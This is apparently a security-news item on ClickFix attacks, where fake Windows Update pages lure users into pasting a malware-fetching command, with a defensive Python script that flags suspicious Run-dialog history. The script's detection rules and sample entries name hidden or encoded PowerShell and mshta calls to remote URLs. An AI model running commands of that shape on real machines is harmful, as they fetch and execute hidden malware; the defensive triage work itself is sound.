Researchers have uncovered a new wave of ClickFix attacks that trick Windows users into installing malware by faking legitimate system update screens and hiding malicious code in images. The scam begins with a full-screen browser page styled to look like the official “Windows Update” interface, which prompts users to press Win+R, paste a command, and run it; that command downloads and executes malware. Instead of arriving as a visible executable file, the payload is concealed via steganography inside a PNG image’s pixel data, then decrypted and loaded directly into memory to bypass traditional antivirus detection. The final malware delivered is often an infostealer such as Rhadamanthys or LummaC2, which can harvest credentials and other sensitive data.

To stay safe, avoid running code or commands from untrusted webpages: legitimate updates and CAPTCHA checks never require manual command-line entry. Use real-time security software, and be cautious whenever a site asks you to paste commands or “verify” your system.
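For responders, the Win+R step described above leaves a trace: Windows records Run-dialog history under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`. The following is an added example, not code from the researchers or the article, that triages exported RunMRU values. The scoring rules, the threshold and the sample entries are assumptions constructed for illustration.

```python
import re

# Heuristics are assumptions for this example, not indicators published in the article.
RULES = {
    # Run-dialog entry starts with a script host, optionally with a full path.
    "script_host": re.compile(
        r"^\s*(?:\S*\\)?(?:powershell|pwsh|mshta|cmd|wscript|cscript)(?:\.exe)?\b", re.I),
    # Command references remote content.
    "remote_url": re.compile(r"https?://", re.I),
    # PowerShell hidden-window or encoded-command switches.
    "hidden_or_encoded": re.compile(
        r"\s-(?:w|win|windowstyle)\s+(?:h|hidden)\b|\s-(?:e|ec|enc|encodedcommand)\s", re.I),
}

# Constructed RunMRU export: value name -> data. Real entries end with "\1",
# and MRUList gives the order, newest first.
SAMPLE_RUNMRU = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": "mshta https://example.invalid/verify\\1",
    "d": "powershell -w hidden -enc PLACEHOLDER\\1",
}

def parse_runmru(values):
    """Return commands newest-first, following MRUList and stripping the '\\1' suffix."""
    cmds = []
    for name in values.get("MRUList", ""):
        data = values.get(name)
        if data is None:          # MRUList can reference a value that was deleted
            continue
        cmds.append(data[:-2] if data.endswith("\\1") else data)
    return cmds

def score(cmd):
    """Names of the rules this command matches, sorted for stable output."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmd))

def triage(values, threshold=2):
    """Commands matching at least `threshold` rules, newest first, with their hits."""
    flagged = []
    for cmd in parse_runmru(values):
        hits = score(cmd)
        if len(hits) >= threshold:
            flagged.append((cmd, hits))
    return flagged

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_RUNMRU):
        print(f"REVIEW {hits}: {cmd}")
```

A plain `cmd` or `notepad` entry matches at most one rule and is not flagged; requiring two matches keeps ordinary Run-dialog use out of the review queue.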
